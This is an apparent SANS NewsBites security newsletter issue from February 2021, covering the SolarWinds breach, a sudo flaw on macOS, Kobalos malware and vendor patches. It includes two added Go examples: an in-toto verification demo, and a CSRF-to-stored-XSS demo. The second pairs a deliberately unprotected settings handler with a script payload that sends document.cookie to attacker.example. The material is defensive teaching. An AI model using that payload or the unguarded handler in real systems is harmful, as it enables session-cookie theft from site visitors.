SANS NewsBites

SolarWinds Hackers Accessed eMail for Months; MacOS sudo Vulnerability

February 5, 2021  |  Volume XXIII - Issue #10

Top of the News


2021-02-03

SolarWinds Hackers Had Access to eMail System for Months

According to a report in the Wall Street Journal (subscription required), the threat actors behind the SolarWinds supply-chain attack likely had access to SolarWinds' email system for nearly a year. In an interview, SolarWinds CEO Sudhakar Ramakrishna said the attackers had access to SolarWinds email accounts as early as December 2019, roughly a year before the trojanized Orion updates were discovered.

Editor's Note

Reducing dwell time by earlier detection is something we all are challenged with. Cloud email providers have tools to help. Make sure to enable the threat detection capabilities in your email system, that you've got adequate monitoring/alerting which is integrated with your SIEM. Also use tools such as the ones from Microsoft and FireEye to detect post-compromise activity to make sure that you're clean now and in the future.

Lee Neely

2021-02-04

SolarWinds Patches Three New Vulnerabilities

SolarWinds has released fixes for three serious security issues. Two of the flaws affect SolarWinds Orion User Device Tracker; the third affects SolarWinds Serv-U FTP for Windows. The flaws were detected by a researcher at Trustwave who notified SolarWinds in late December. SolarWinds released fixes for the flaws in an update last week.

Editor's Note

SolarWinds is going to be under the microscope as they recover from their breach. Even so, their updates and fixes need to be considered and applied if warranted. If you're bound by DHS's ED 21-01 (https://cyber.dhs.gov/ed/21-01/#supplemental-guidance-v3) and permitted to run Orion, the directive is to use at least version 2020.2.1 HF2, so you're ok to install 2020.2.4. Definitely patch any internet facing Serv-U FTP servers.

Lee Neely

SolarWinds obviously has a credibility problem around updates, since compromised SolarWinds Orion updates were used to infiltrate many SolarWinds customers. Trusted, high-quality patches and updates are key to rapid patching - just like the false positive rate of detection processes and products is key to rapid prevention/mitigation. See related comment on the "Better Patches Could Reduce the Number of Zero Days" item.

John Pescatore

2021-02-03

Sudo Vulnerability Affects macOS

A heap-based buffer overflow recently disclosed in sudo, first reported on Linux, has been found to also affect the most recent version of macOS, Big Sur 11.2. A local, unprivileged user can exploit the bug to gain root privileges. No fix is currently available for macOS 11.2.

Editor's Note

This flaw has also been reproduced on AIX. Until explicitly updated, assume all sudo versions are vulnerable. macOS users cannot update sudo directly due to OS integrity protection, introduced in macOS 10.11, which restricts overwriting of applications or files. Expect a fix in the next OS update from Apple.

Lee Neely

This is a privilege escalation vulnerability, requires access, and is mostly of concern in multi-user or managed systems. That said, this is a case where code has been reused in tens of products for a decade without anyone assessing its quality and suitability. Open source is not delivering on its security promise. What is everyone's responsibility is no one's responsibility. Developers must be held responsible for all the code in their products without regard to source.

William Hugh Murray

The Rest of the Week's News


2021-02-02

Claim: in-toto Cybersecurity System Might Have Helped Prevent SolarWinds Attack

The academic developers of in-toto, a software supply-chain integrity framework whose development was funded by the US government, claim their approach might have prevented the SolarWinds supply-chain attack or reduced its severity. In-toto "is designed to ensure the integrity of a software product from initiation to end-user installation. It does so by making it transparent to the user what steps were performed, by whom and in what order. As a result, with some guidance from the group creating the software, in-toto allows the user to verify if a step in the supply chain was intended to be performed, and if the step was performed by the right actor." The US government has never required its vendors to use in-toto.
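As an added illustration of the mechanism the quoted description refers to (this is example code written for this item, not in-toto's own implementation nor anything from the original newsletter), the Go program below implements the core of the idea: a layout lists the ordered steps and the single key authorized to sign each one; each functionary records signed link metadata naming the artifacts it consumed (materials) and produced (products); verification then checks that every step's link is present, was signed by the authorized key, and that each step's materials match the previous step's products. The step names, keys, source and binary are constructed for the example; a real in-toto layout also carries expiry, inspections and richer artifact rules, which are omitted here.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"fmt"
)

// Artifacts maps a path to its sha256 hex digest, the way in-toto link
// metadata records materials (inputs) and products (outputs).
type Artifacts map[string]string

// Link is what one functionary records after performing a step.
type Link struct {
	Step      string    `json:"step"`
	Materials Artifacts `json:"materials"`
	Products  Artifacts `json:"products"`
}

// SignedLink is the serialized link plus the functionary's ed25519 signature.
type SignedLink struct {
	Payload []byte
	Sig     []byte
}

// Step in the layout: its name and the only key allowed to sign its link.
type Step struct {
	Name string
	Key  ed25519.PublicKey
}

// Layout is the project owner's ordered statement of the expected steps.
type Layout struct{ Steps []Step }

func digest(b []byte) string {
	s := sha256.Sum256(b)
	return hex.EncodeToString(s[:])
}

func sign(priv ed25519.PrivateKey, l Link) SignedLink {
	p, _ := json.Marshal(l)
	return SignedLink{Payload: p, Sig: ed25519.Sign(priv, p)}
}

// Verify walks the layout in order and checks that each step has link
// metadata, that it was signed by the authorized functionary, and that the
// step's materials equal the previous step's products (in-toto's MATCH
// rule), so an artifact swapped between steps is detected.
func Verify(lay Layout, links map[string]SignedLink) error {
	var prev Artifacts
	for i, st := range lay.Steps {
		sl, ok := links[st.Name]
		if !ok {
			return fmt.Errorf("step %q: no link metadata", st.Name)
		}
		if !ed25519.Verify(st.Key, sl.Payload, sl.Sig) {
			return fmt.Errorf("step %q: not signed by the authorized functionary", st.Name)
		}
		var l Link
		if err := json.Unmarshal(sl.Payload, &l); err != nil || l.Step != st.Name {
			return fmt.Errorf("step %q: malformed or mislabelled link", st.Name)
		}
		if i > 0 {
			for path, h := range l.Materials {
				if prev[path] != h {
					return fmt.Errorf("step %q: material %s does not match a product of %q",
						st.Name, path, lay.Steps[i-1].Name)
				}
			}
		}
		prev = l.Products
	}
	return nil
}

// Demo runs a two-step chain (build, then package) under one of three
// scenarios and returns Verify's result. Keys and artifacts are generated
// here purely for the example.
func Demo(scenario string) error {
	buildPub, buildPriv, _ := ed25519.GenerateKey(rand.Reader)
	pkgPub, pkgPriv, _ := ed25519.GenerateKey(rand.Reader)
	_, roguePriv, _ := ed25519.GenerateKey(rand.Reader)
	lay := Layout{Steps: []Step{{"build", buildPub}, {"package", pkgPub}}}

	src := []byte("int main(void) { return 0; }") // constructed sample source
	bin := []byte("honest build output")          // constructed sample binary
	build := Link{"build", Artifacts{"main.c": digest(src)}, Artifacts{"app": digest(bin)}}

	pkgInput, pkgKey := bin, pkgPriv
	switch scenario {
	case "swapped-artifact": // binary replaced between the build and package steps
		pkgInput = []byte("backdoored build output")
	case "rogue-signer": // packaging link signed by a key the layout does not authorize
		pkgKey = roguePriv
	}
	pkg := Link{"package", Artifacts{"app": digest(pkgInput)},
		Artifacts{"app.tar": digest(append([]byte("tar:"), pkgInput...))}}
	links := map[string]SignedLink{"build": sign(buildPriv, build), "package": sign(pkgKey, pkg)}
	return Verify(lay, links)
}

func main() {
	for _, s := range []string{"honest", "swapped-artifact", "rogue-signer"} {
		fmt.Printf("%-17s -> %v\n", s, Demo(s))
	}
}
```

The honest run verifies; replacing the binary between steps fails the materials-versus-products match, and a packaging link signed by an unauthorized key fails the signature check, which is the "right step, right actor, right order" property the in-toto authors describe.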

Editor's Note

Perhaps the in-toto developers (and the journalists implying the government is incompetent) might first want to prove their approach works at scale in their own universities, and that it has been widely adopted there and works effectively for large complex systems.

Alan Paller

2021-02-03

Better Patches Could Reduce the Number of Zero-days

Maddie Stone, a Google security researcher, told an audience at the USENIX Enigma 2021 virtual conference that more than one-third of the 24 zero-day vulnerabilities Google's Project Zero team found last year were variants of other security issues that had already been disclosed or had been incompletely patched. In a blog post, Stone writes, "If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days."

Editor's Note

It's easy to get tunnel-vision when a flaw is reported and only address that issue, particularly when facing a disclosure countdown. The security code review has to begin at inception, not after flaws are discovered; it's a nearly insurmountable task to review and fix existing applications. One approach is to augment bug fix procedures to include activities to seek and find and remediate similar flaws elsewhere in the code, possibly necessitating a second release.

Lee Neely

(Long anecdote coming, you can skip to the last sentence if not in the mood.) Years ago I worked for the Secret Service and part of the job was being part of advance teams and doing "technical security" in places where the protectee would visit or stay overnight. In hotels, we had to get the elevator maintenance guy to come in, inspect the elevators and recommend which one was the most reliable. On the first trip I worked solo after training and working in tandem for a few trips, in Denver, the Otis elevator guy said "I just did a repair and full preventive maintenance on elevator A, but elevator B never fails - you should use B. It always seems like on these new fancy elevators with all the electronics when I fix something, I also weaken something else that breaks the following week." I felt that elevator B was probably due to fail, ignored the advice, chose elevator A and the next morning Vice President George H. W. Bush got stuck in elevator A when the doors opened three feet above the lobby. Much paperwork ensued. Moral of the story: as we learned with Windows patches in the early days, too many software vendors treat patching as a drain on profits and don't invest in doing it right. Poor patch QA is usually a sign of bigger problems at the vendor - lack of sufficient maturity in software life cycle, under investment in QA overall, etc.

John Pescatore

2021-02-03

StormShield Discloses Security Incident

French cybersecurity company StormShield has disclosed that it "detected a security incident that resulted in an unauthorized access to a technical portal used ... by our customers and partners for the management of their support tickets on our products." The intruders also appear to have stolen some StormShield Network Security source code. StormShield has notified affected customers and has contacted authorities regarding the incident.


2021-02-02

Ransomware Operators are Targeting Industrial Goods and Services

According to data gathered by Digital Shadows, ransomware operators targeted organizations in the industrial goods and services sector more than any other; it accounts for 29 percent of reported ransomware attacks. The three next most-targeted sectors - construction, technology, and retail - account for nine, eight, and seven percent of reported ransomware attacks.


2021-02-04

SonicWall Firmware Patch

SonicWall has released a firmware patch to address critical vulnerabilities in SMA 100 series 10.x code that are being actively exploited. The issues are fixed in the SMA 100 series firmware 10.2.0.5-29sv update.


2021-02-02

Kobalos Malware Targets High-Performance Computing Networks

A small piece of backdoor malware is targeting high-performance computing clusters. Dubbed Kobalos by researchers at ESET, the "malware gives access to the file system of the compromised host and enables access to a remote terminal, giving the attackers the ability to run arbitrary commands." ESET surmised that the systems infected with Kobalos are specifically targeted because they belong to high-profile organizations.

Editor's Note

I work with a High-Performance Computing (HPC) group which has required 2FA authentication on SSH, and limited which SSH keys, particularly from third-party organizations, can be installed, for 21 years. Those simple mitigations, along with rigorous configuration management and monitoring, are very effective controls. HPC is a very different environment from conventional data center computing resources. HPC services are often exposed to the Internet due to the size of data exchanged, and resources carefully allocated and managed. While we were getting used to gigabytes, they were working in terabyte and petabyte data sets, and in-line security devices which introduce latency can fatally impact operations. They look back on when they could only get 40gb network connections. Note that ESET has published IOCs for detecting the malware; see the We Live Security PDF below.

Lee Neely

2021-02-04

Cisco Releases Fixes for Vulnerabilities Affecting Some VPN Routers

Cisco has released updates to address multiple vulnerabilities in its small-business VPN routers, models RV160, RV160W, RV260, RV260P, and RV260W, running firmware releases prior to 1.0.01.02. The flaws are in the routers' web-based management interface, which should not be reachable from untrusted networks.

Editor's Note

Vendors and users should prefer purpose-built management interfaces.

William Hugh Murray

2021-02-06

Wordfence: Remove Contact Form 7 Style WordPress Plugin

Wordfence is warning of an unpatched Cross-Site Request Forgery (CSRF) to Stored Cross-Site Scripting (XSS) vulnerability in the Contact Form 7 Style WordPress plugin. (Contact Form 7 Style is an add-on to the Contact Form 7 plugin, not the Contact Form 7 plugin itself.) In this class of flaw, an attacker lures a logged-in administrator to a page that submits a settings change on the administrator's behalf; because the plugin does not verify that the request originated from its own form, the attacker-chosen value is saved, and because it is later rendered without escaping, the injected script runs for every visitor. The plugin's developer has been contacted several times but has not responded. Wordfence "strongly recommends deactivating and removing this plugin and finding a replacement as it no longer appears to be maintained by its developer."
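To make the CSRF-to-stored-XSS chain concrete, here is an added example (written for this item in Go; it is not the plugin's code, Wordfence's, or anything from the original newsletter) of a settings handler in its vulnerable form beside a hardened form. The "custom CSS" option, the token name `_nonce`, and the attacker payload are all constructed for the example. The vulnerable handler saves whatever a POST carrying the admin's cookie sends and echoes it raw; the hardened handler rejects any request without the per-session token, which a cross-site page cannot obtain, and renders the stored value through html/template, which refuses unsafe content in a CSS context.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"html/template"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// plugin stands in for a settings page: an admin saves a "custom CSS" option
// and every visitor's page later includes it.
type plugin struct {
	customCSS string
	nonce     string // per-admin-session token; the equivalent of a WordPress nonce
}

// vulnerableSave accepts any POST that carries the admin's cookie and stores
// the value unchanged. A page on another site can submit this form on the
// admin's behalf, which is the CSRF half of the chain.
func (p *plugin) vulnerableSave(w http.ResponseWriter, r *http.Request) {
	p.customCSS = r.FormValue("css")
	w.WriteHeader(http.StatusNoContent)
}

// vulnerableRender echoes the stored value raw, turning the forged save into
// stored XSS for every visitor.
func (p *plugin) vulnerableRender(w http.ResponseWriter, r *http.Request) {
	_, _ = w.Write([]byte("<style>" + p.customCSS + "</style>"))
}

// hardenedSave rejects requests whose token does not match the one issued to
// this admin session; a forged cross-site request cannot know it.
func (p *plugin) hardenedSave(w http.ResponseWriter, r *http.Request) {
	if p.nonce == "" || subtle.ConstantTimeCompare([]byte(r.FormValue("_nonce")), []byte(p.nonce)) != 1 {
		http.Error(w, "invalid nonce", http.StatusForbidden)
		return
	}
	p.customCSS = r.FormValue("css")
	w.WriteHeader(http.StatusNoContent)
}

// styleTmpl is contextually escaped: html/template knows {{.}} sits inside a
// <style> element and replaces values that could break out of it.
var styleTmpl = template.Must(template.New("style").Parse("<style>{{.}}</style>"))

func (p *plugin) hardenedRender(w http.ResponseWriter, r *http.Request) {
	_ = styleTmpl.Execute(w, p.customCSS)
}

func newNonce() string {
	b := make([]byte, 16)
	_, _ = rand.Read(b)
	return hex.EncodeToString(b)
}

// post and get drive a handler in-process, standing in for the browser.
func post(h http.HandlerFunc, form url.Values) int {
	req := httptest.NewRequest("POST", "/save", strings.NewReader(form.Encode()))
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Code
}

func get(h http.HandlerFunc) string {
	rec := httptest.NewRecorder()
	h(rec, httptest.NewRequest("GET", "/", nil))
	return rec.Body.String()
}

// payload is a constructed value a malicious site would submit: it closes the
// style block and runs script in every visitor's browser.
const payload = `</style><script>fetch("https://attacker.example/?c="+document.cookie)</script>`

// Attack replays the forged POST against both versions and returns what a
// later visitor receives, plus the status the hardened handler gives the forgery.
func Attack() (vulnPage string, forgedStatus int, hardPage string) {
	v := &plugin{}
	post(v.vulnerableSave, url.Values{"css": {payload}})
	vulnPage = get(v.vulnerableRender)

	h := &plugin{nonce: newNonce()}
	forgedStatus = post(h.hardenedSave, url.Values{"css": {payload}}) // forged: no token
	// Even a legitimate save of the same value (correct token) renders without script.
	post(h.hardenedSave, url.Values{"css": {payload}, "_nonce": {h.nonce}})
	hardPage = get(h.hardenedRender)
	return
}

func main() {
	vulnPage, status, hardPage := Attack()
	fmt.Println("vulnerable visitor page:", vulnPage)
	fmt.Println("hardened: forged POST status", status, "; visitor page:", hardPage)
}
```

In a WordPress plugin the same two controls are `wp_nonce_field()` on the form with `check_admin_referer()` in the save handler, plus sanitizing on input and escaping on output with the `esc_*` functions. Setting the login cookie with a SameSite attribute further limits what a cross-site POST can carry, but it does not replace the nonce check.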

Editor's Note

Read carefully: the flaw is in the Contact Form 7 Style plugin, not the Contact Form 7 plugin itself; if you have other plugins for Contact Form 7, make sure they are up-to-date. If you are running Wordfence, free or paid, the built-in XSS protections will mitigate attempted exploits. Even so, a plugin that is not being actively supported should be removed/replaced before additional unpatched flaws are discovered.

Lee Neely

WordPress plugin of the week. Use plugins sparingly and police them actively.

William Hugh Murray

2021-02-04

IBM Announces Grant Program to Help Schools with Ransomware Protection

IBM has announced a $3 million grant program to help US school districts protect their systems from ransomware. IBM will award $500,000 in-kind grants to six school districts, which will be chosen through an application process. The applications opened on February 4 and close on March 1, 2021. Teams from IBM's Service Corps Program will "help [the selected schools] proactively prepare for and respond to cyberattacks."

Editor's Note

With the increased reliance on network services to deliver classroom content, and without corresponding increases in cyber security initiatives to help keep those services and online activities secure, these grants may be helpful. These in-kind grants include a team of six to ten people from IBM's Service Corps Program to help develop incident response plans and implement basic cyber security training, including online hygiene and password management.

Lee Neely

Certainly a worthy effort but it shines a light on just how costly this problem is. There are 130K school districts in the US. At $500K per, "pretty soon, that adds up to real money."

William Hugh Murray

Internet Storm Center Tech Corner

SolarWinds SANS Lightning Summit

https://www.sans.org/webcasts/solarwinds-lightning-summit-118550


New Example of XSL Script Processing aka "Mitre T1220"

https://isc.sans.edu/forums/diary/New+Example+of+XSL+Script+Processing+aka+Mitre+T1220/27056/


Excel Spreadsheets Push SystemBC Malware

https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/


Abusing Google Chrome Extension Syncing For Data Exfiltration and C&C

https://isc.sans.edu/forums/diary/Abusing+Google+Chrome+extension+syncing+for+data+exfiltration+and+CC/27066/


Camerfirma Certificate Authority Revocation

https://groups.google.com/g/mozilla.dev.security.policy/c/jif4zWNgGPw


Social Engineering Attacks against Security Researchers Used IE 0 day

https://enki.co.kr/blog/2021/02/04/ie_0day.html

https://www.bleepingcomputer.com/news/security/hacking-group-also-used-an-ie-zero-day-against-security-researchers/


Kobalos HPC Linux Malware

https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/


Agent Tesla Overwrites Windows AMSI

https://threatpost.com/agent-tesla-microsoft-asmi/163581/


SolarWinds Vulnerability

https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28389


SonicWall Patch

https://www.sonicwall.com/support/product-notification/urgent-patch-available-for-sma-100-series-10-x-firmware-zero-day-vulnerability-updated-feb-3-2-p-m-cst/210122173415410/


Cisco Advisories

https://tools.cisco.com/security/center/publicationListing.x


Realtek RTL8195A Wi-Fi Module Vulnerability

https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered


Microsoft Defender ATP Google Chrome False Positive

https://twitter.com/itquartz/status/1356940218138509312